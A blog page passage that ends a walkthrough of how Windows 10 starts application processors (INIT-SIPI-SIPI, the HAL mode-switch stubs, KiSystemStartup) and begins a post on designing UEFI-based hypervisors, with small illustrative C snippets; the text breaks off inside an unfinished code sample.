<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsybIAYQgiyTlGXcv35mXeEO2JvqaNZpnqPXcI0_ITYtq5q9W-FVBL9V7aWJRNvCdW6JzcQSuet46F-_ajGUfRCnQ19JYSE7HmltlY2JtP8n2VLn_99-Fp5srJeZEHl4T3_8-3nDjEcQ/s1600/Annotation+2020-02-24+211858.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="624" data-original-width="1425" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsybIAYQgiyTlGXcv35mXeEO2JvqaNZpnqPXcI0_ITYtq5q9W-FVBL9V7aWJRNvCdW6JzcQSuet46F-_ajGUfRCnQ19JYSE7HmltlY2JtP8n2VLn_99-Fp5srJeZEHl4T3_8-3nDjEcQ/s320/Annotation+2020-02-24+211858.png" width="320" /></a></div>
<br />
From the code, the value of EDI is known to be 0x13000, because EDI is CS << 4, and CS is VV00H, where VV is the SIPI vector taken from bits [19:12] of the startup IP, as stated in 8.4.3 (see the comment in the above pseudo code).<br />
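<div>
The real-mode address arithmetic behind that value can be sketched as follows. The function names are hypothetical; the 0x60 offset is the one followed in the next section.</div>

```c
#include <stdint.h>

/* CS selector loaded when an AP receives a SIPI with the given vector: VV00H. */
static uint16_t SipiCodeSegment(uint8_t vector)
{
    return (uint16_t)((uint16_t)vector << 8);
}

/* Real-mode linear address: segment * 16 + offset. */
static uint32_t RealModeLinearAddress(uint16_t segment, uint16_t offset)
{
    return ((uint32_t)segment << 4) + offset;
}
```

<div>
With the vector 0x13, CS is 0x1300, CS << 4 is 0x13000, and a field at offset 0x60 sits at the physical address 0x13060.</div>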
<br />
<h3>
HalpPMStub - Protected-Mode </h3>
<br />
Following EDI+0x60 navigates us to the protected mode stub implemented as HalpPMStub.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNwyYT1p1KVZn2BgIAlL-0WMEhQckzSQ5j7zquhhosv4qw6TxHwouJSaqXNkRlOoTFMtL_flCOp4kIGpkSKZdbXUv0j7YEOuaITwEw2ZDnlWOVhvIIPtGfMY3HNn2tqfJfMaGHc_svhMc/s1600/Annotation+2020-02-24+212449.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="1212" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNwyYT1p1KVZn2BgIAlL-0WMEhQckzSQ5j7zquhhosv4qw6TxHwouJSaqXNkRlOoTFMtL_flCOp4kIGpkSKZdbXUv0j7YEOuaITwEw2ZDnlWOVhvIIPtGfMY3HNn2tqfJfMaGHc_svhMc/s320/Annotation+2020-02-24+212449.png" width="320" /></a></div>
<br />
This code is responsible for switching to the long-mode. As seen below, it<br />
<ul>
<li>sets CR4.PAE (0x20), which long-mode requires,</li>
<li>updates IA32_EFER, then</li>
<li>sets CR0.PG (0x80000000), to activate the long-mode (see the second screenshot).</li>
</ul>
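<div>
As a rough model of this sequence, the sketch below tracks the relevant control bits in an ordinary struct rather than touching real registers. CPU_MODE_STATE and both functions are hypothetical names; the bit positions are the architectural ones for CR0.PE, CR0.PG, CR4.PAE, and IA32_EFER.LME. It assumes the standard rule that long-mode becomes active once paging is enabled while PAE and LME are set.</div>

```c
#include <stdbool.h>
#include <stdint.h>

#define CR0_PE   0x00000001u   /* protection enable */
#define CR0_PG   0x80000000u   /* paging */
#define CR4_PAE  0x00000020u   /* physical address extension */
#define EFER_LME 0x00000100ull /* long-mode enable (IA32_EFER bit 8) */

/* Hypothetical snapshot of the registers involved in the mode switch. */
typedef struct {
    uint32_t Cr0;
    uint32_t Cr4;
    uint64_t Efer;
} CPU_MODE_STATE;

/* Applies the three steps in the order the stub performs them. */
static void ActivateLongMode(CPU_MODE_STATE *state)
{
    state->Cr4 |= CR4_PAE;
    state->Efer |= EFER_LME;
    state->Cr0 |= CR0_PG;
}

/* Long-mode is active only when all of the prerequisites hold at once. */
static bool IsLongModeActive(const CPU_MODE_STATE *state)
{
    return (state->Cr0 & CR0_PE) != 0 &&
           (state->Cr0 & CR0_PG) != 0 &&
           (state->Cr4 & CR4_PAE) != 0 &&
           (state->Efer & EFER_LME) != 0;
}
```

<div>
Starting from a protected-mode state with only CR0.PE set, the model reports long-mode as active only after all three steps have been applied.</div>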
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftn246wcF9_dd_a_KoXlCZOnfpV8DcgOSNEx9yGoJjOWrSrSYIVKnt-QdrkYbq88psPmkupDU_yiaUoDW3GWB9A0WJKMHlNlEYnPJtO8s8Rh5JKy-d4up66lB65Qd5yDC0w6DTgf1fSU/s1600/Annotation+2020-02-24+214116.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="549" data-original-width="1212" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftn246wcF9_dd_a_KoXlCZOnfpV8DcgOSNEx9yGoJjOWrSrSYIVKnt-QdrkYbq88psPmkupDU_yiaUoDW3GWB9A0WJKMHlNlEYnPJtO8s8Rh5JKy-d4up66lB65Qd5yDC0w6DTgf1fSU/s320/Annotation+2020-02-24+214116.png" width="320" /></a></div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdjfN1DGhe4PKkgxKZO_2DZIIVXiQq5Ns4UI64I_lgmr1vBS0L88he_hUV5wh7HdSU1s5IvGN-O69SbsohxMQzyd4UOwAzYrrd9g3UJbYkEdR8PYxWnvXJtgLDKLT_U9nM8ZdUlYnEFo0/s1600/Annotation+2020-02-24+214509.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="147" data-original-width="1194" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdjfN1DGhe4PKkgxKZO_2DZIIVXiQq5Ns4UI64I_lgmr1vBS0L88he_hUV5wh7HdSU1s5IvGN-O69SbsohxMQzyd4UOwAzYrrd9g3UJbYkEdR8PYxWnvXJtgLDKLT_U9nM8ZdUlYnEFo0/s320/Annotation+2020-02-24+214509.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Then, it jumps out to where RDI+0x66 specifies. </div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlLas_-v-TaSOU7k102shk1PRWPqxgL2p0tiEn0hyphenhyphenXX00vdRbtGi-0lsGtOLP64R6WIpz_M62LUZzrvQGFOzxdZOs3p7-mErRTEON3xRLKsgOl9mDRg5l8ODmJUgk20G8wGuVZPik68s/s1600/Annotation+2020-02-24+214942.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="1368" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlLas_-v-TaSOU7k102shk1PRWPqxgL2p0tiEn0hyphenhyphenXX00vdRbtGi-0lsGtOLP64R6WIpz_M62LUZzrvQGFOzxdZOs3p7-mErRTEON3xRLKsgOl9mDRg5l8ODmJUgk20G8wGuVZPik68s/s320/Annotation+2020-02-24+214942.png" width="320" /></a></div>
<br />
<h3>
HalpLMIdentityStub - Long-Mode under Identity Mapping</h3>
<br />
The JMP leads to the short stub whose sole responsibility is to retrieve the value of CR3 that can permanently be used, that is, the same value as that of BSP.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-daLmPm6bfIKRSpSpbZB2Od9391rPCAqIhqEA37pqSO4lR8uUh73Cj_d9tkBLNWhPrsvcX_TtBLobSzhQWDk9ITxjegeToi7wUvnNwMz9w4nXLWrpb6N3fCNbgtCWe2sWwLvN0bI1wSo/s1600/Annotation+2020-02-24+215451.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="281" data-original-width="1600" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-daLmPm6bfIKRSpSpbZB2Od9391rPCAqIhqEA37pqSO4lR8uUh73Cj_d9tkBLNWhPrsvcX_TtBLobSzhQWDk9ITxjegeToi7wUvnNwMz9w4nXLWrpb6N3fCNbgtCWe2sWwLvN0bI1wSo/s320/Annotation+2020-02-24+215451.png" width="320" /></a></div>
<br />
As the processor should already be working with virtual addresses, let us switch to them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGuV0XqwnqYfH6BSxGdGncMZeHGmktEq42CXeolTI0RwvtZXQ833nqSodWkPnq4Haksu49lQHn_el-SVLDHNrKrjUQnkWeP5HRExyokzzkjB5Rrda-3tmAyrPSVVfEABPEVIEHk7c-Ro/s1600/Annotation+2020-02-24+215858.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1275" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGuV0XqwnqYfH6BSxGdGncMZeHGmktEq42CXeolTI0RwvtZXQ833nqSodWkPnq4Haksu49lQHn_el-SVLDHNrKrjUQnkWeP5HRExyokzzkjB5Rrda-3tmAyrPSVVfEABPEVIEHk7c-Ro/s320/Annotation+2020-02-24+215858.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
RDI+0x70 gives us HalpLMStub.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje12Uimgg4QyXGm_gBisJ7Xqp8VlsRDGh2hyphenhyphenASpe0LFY1yhghde-hVX0gb5HyeBzj_D9YXumiIrV6Ug3oBhmYh4we4QEsC9iuKrD1fRDtYNPRsL8YIH-afv-S0RYSFfh2HYFU9JZ1qrc4/s1600/Annotation+2020-02-24+220143.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="120" data-original-width="1365" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje12Uimgg4QyXGm_gBisJ7Xqp8VlsRDGh2hyphenhyphenASpe0LFY1yhghde-hVX0gb5HyeBzj_D9YXumiIrV6Ug3oBhmYh4we4QEsC9iuKrD1fRDtYNPRsL8YIH-afv-S0RYSFfh2HYFU9JZ1qrc4/s320/Annotation+2020-02-24+220143.png" width="320" /></a></div>
<br />
<h3>
HalpLMStub - Long-Mode</h3>
<br />
This is the final stub that APs go through. The first thing this stub does is to apply the permanent CR3 value to have the same memory layout as BSP (and any other already initialized APs), followed by invalidation of TLBs.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDczQqkwhL-VO-3SgX7y0hGaozd9vUAAoAcV22_KLLDYdwIIWxboeYGS6GOf0-25V0-clWNVwShfn4Er5VocSQce3nuL3Xm2bnVY4WtZW7uv97TJuQKdAon1vpX5bVOIkmj2R2meG9yfw/s1600/Annotation+2020-02-24+221146.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="1563" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDczQqkwhL-VO-3SgX7y0hGaozd9vUAAoAcV22_KLLDYdwIIWxboeYGS6GOf0-25V0-clWNVwShfn4Er5VocSQce3nuL3Xm2bnVY4WtZW7uv97TJuQKdAon1vpX5bVOIkmj2R2meG9yfw/s320/Annotation+2020-02-24+221146.png" width="320" /></a></div>
<br />
After switching the page tables, it performs various initialization steps, and at the end, it jumps out to where RDI+0x278 indicates.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3S7Sa6g_mU1RHZP4r4_SU4ZHzJZFIPfgK9q6sZDxQctCMkuyXKUY9eMzA7txKLWVTgrZG-lbOjw0e7ioVLyFGyhLKxusCALPrMbH-jB0bPPJOqjGrAOlUxzXh1r8SY5AuLY5rNnlydY8/s1600/Annotation+2020-02-24+222135.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1308" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3S7Sa6g_mU1RHZP4r4_SU4ZHzJZFIPfgK9q6sZDxQctCMkuyXKUY9eMzA7txKLWVTgrZG-lbOjw0e7ioVLyFGyhLKxusCALPrMbH-jB0bPPJOqjGrAOlUxzXh1r8SY5AuLY5rNnlydY8/s400/Annotation+2020-02-24+222135.png" width="326" /></a></div>
This ends up with nt!KiSystemStartup, letting the AP run the same initialization code as BSP (except for a few things done exclusively by BSP).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2Qrx0S0vtaXiN-XZLPwqxAZxhxQ3A9mgdGyovJ5vi23v2YwPLCHSu8Cbmx5o_mn_8mN7TIEgOy8LwvC_LBPB4m9qkY8jGNpdWTGzwTljzdb3Sl_S9fZz_8Vd6p3ENgP8hBjuhUbLleY/s1600/Annotation+2020-02-24+222807.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="119" data-original-width="1600" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2Qrx0S0vtaXiN-XZLPwqxAZxhxQ3A9mgdGyovJ5vi23v2YwPLCHSu8Cbmx5o_mn_8mN7TIEgOy8LwvC_LBPB4m9qkY8jGNpdWTGzwTljzdb3Sl_S9fZz_8Vd6p3ENgP8hBjuhUbLleY/s400/Annotation+2020-02-24+222807.png" width="400" /></a></div>
<br />
<h2>
Conclusion</h2>
</div>
<div>
We reviewed how Windows initiates execution of APs with the INIT-SIPI-SIPI sequence and how APs go through from real-mode to the regular NT kernel initialization function on Windows 10 19H1 without Hyper-V.</div>
<div>
</div>
<div>
Hopefully, you enjoyed this post and gained more context on the INIT-SIPI-SIPI VM-exits you may see while writing a hypervisor too.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-58316420195176399122020-03-13T07:08:00.000-07:002020-03-13T07:18:24.888-07:00Introduction and Notes on Design Considerations of UEFI-based Hypervisors <span style="font-size: 13.5pt;">In this post, I am going to write up some of the lessons learned and the challenges I had
to go through to write </span><a href="https://github.com/tandasat/MiniVisorPkg" style="font-size: 13.5pt;" target="_blank">a UEFI-based hypervisor that supports booting Windows</a><span style="font-size: 13.5pt;">. I
hope this post gives pointers to study and helps you get started with writing a
similar hypervisor.</span><br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hMH_VYgQMPSoEAWjQ6h2mNwyw6_Ny8v6qg95dxzRBxB9ZY7qsys5DypUpOrN1yipfkpxz9f7GfY5lfw3e0TFyEONW2U2Cjb0OHtTdz3AxmOe-iNmOfmAb-8SSuV-qgFjtImO89JXwa8/s1600/IMG_6315.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hMH_VYgQMPSoEAWjQ6h2mNwyw6_Ny8v6qg95dxzRBxB9ZY7qsys5DypUpOrN1yipfkpxz9f7GfY5lfw3e0TFyEONW2U2Cjb0OHtTdz3AxmOe-iNmOfmAb-8SSuV-qgFjtImO89JXwa8/s320/IMG_6315.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">UEFI hypervisor brief design walk-through</td></tr>
</tbody></table>
</div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Background</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Lately, I spent some time
studying EDK2-based UEFI programming and developed a hypervisor as a UEFI driver.
It has been fun and turned out to be more straightforward than I initially
imagined, but at the same time, there was a learning curve and there were technical
challenges I had to take extra time to understand and overcome.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">The major reason for taking
extra time was the lack of write-ups or tutorials for my goal. Although there were
a few open-source projects and many documents and presentations I was able to
study, those were not focused on UEFI programming in the context of writing
hypervisors. This is entirely understandable as I do not suppose those are
common subjects, and that is also why I wrote up this post.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">In this post, I will start by
giving a high-level overview of UEFI, and unique aspects in its execution
environment, then look into challenges of writing a hypervisor as a
UEFI driver.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;"><br /></span></div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="font-size: 18px;">UEFI Execution Environment</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">UEFI vs EDK2</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">UEFI is the specification of
firmware to replace legacy-BIOS, where no standard exists, and offers a
well-defined execution environment and programming interfaces. EDK2 is the
open-source, reference implementation of the specification and provides tools
to develop firmware modules.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="margin: 0in 0in 0.0001pt;">
<span style="font-size: 13.5pt;">Application vs Driver</span></h3>
<div>
<span style="font-size: 13.5pt;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Firmware modules can be built
as part of a whole firmware image or as a standalone module (file) to be
separately deployed. The latter is how I compiled the module. Additionally,
UEFI modules can be written as an application which is unloaded from memory
once its execution finishes, or as a driver which remains loaded unless explicitly
unloaded. Obviously, the driver is the natural choice for the hypervisor, although I will mention the other common approach later.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Boot Time vs Run Time</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">The execution environment of
drivers can be separated into two different phases: boot time and run time.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Roughly speaking, the boot time
is before execution is handed over to the operating system and the run time is
after that. This transition happens when a UEFI-defined API called
ExitBootServices is called. In the case of Windows startup, this is sometime
before winload.efi transfers its execution to ntoskrnl.exe.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Most of the firmware drivers
loaded in memory are unloaded at this point because most of them, for example,
a network driver for PXE boot, are no longer needed once execution is handed
over to the operating system. Drivers of this type are called boot drivers and are
not suitable for the hypervisor that is meant to stay alive even after the
operating system is fully started.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Runtime drivers, on the other
hand, are the type of driver that resides in memory throughout the system life
span and are suited for the hypervisor.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Boot-time Services vs Run-time
Services</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="margin: 0in 0in 0.0001pt; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2;">
<span style="font-size: 13.5pt;">UEFI defines a collection of
APIs, and their </span><span style="font-size: 18px;">availability</span><span style="font-size: 13.5pt;"> is impacted by the boot-to-run time transition.
The type of API called boot-time services can no longer be used after the
transition because drivers that implement the API are unloaded. After this transition,
runtime drivers can only use the run-time services, which drastically reduces
the ability of the hypervisor to interact with the environment.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Physical Mode vs Virtual Mode</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another transition that the runtime
drivers have to go through is the change of the memory address layout.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">At the boot time, the system is
in the long-mode, same as Windows. However, virtual to physical address mapping
is pure 1:1, that is, the virtual address 0xdf2000 is translated into the
physical address 0xdf2000. This mode is called physical mode.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Soon after the transition to run
time, a bootloader (winload.efi in the case of Windows) sets up and configures
new page tables to map runtime drivers to the addresses that work well with the
operating system (eg, the physical address 0xdf2000 may be mapped to
0xfffff803`1ce40000). Then, the bootloader calls the SetVirtualAddressMap run-time
service letting runtime drivers perform their preparation, switches to the new
page table and discards the old page table. After this point, the runtime
drivers are mapped to only the new address, just like regular Windows drivers.
This mode is called virtual mode. This transition can be catastrophic if the
hypervisor depends on the physical mode page tables. We will review how it can
be a problem.<o:p></o:p></span></div>
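<div>
To illustrate what the address change means for a pointer held by a runtime driver, here is a small model in plain C. It is only a sketch: RUNTIME_REGION is a simplified, hypothetical stand-in for the PhysicalStart, VirtualStart, and NumberOfPages fields of a UEFI memory descriptor, and ConvertToVirtual is a hypothetical function. A real runtime driver would rely on the ConvertPointer run-time service rather than code like this.</div>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE_4K 0x1000ull

/* Simplified, hypothetical stand-in for a UEFI memory descriptor. */
typedef struct {
    uint64_t PhysicalStart;  /* address in physical mode (1:1 mapping) */
    uint64_t VirtualStart;   /* address assigned by the bootloader */
    uint64_t NumberOfPages;  /* region size in 4KB pages */
} RUNTIME_REGION;

/* Translates a physical-mode address into its virtual-mode counterpart.
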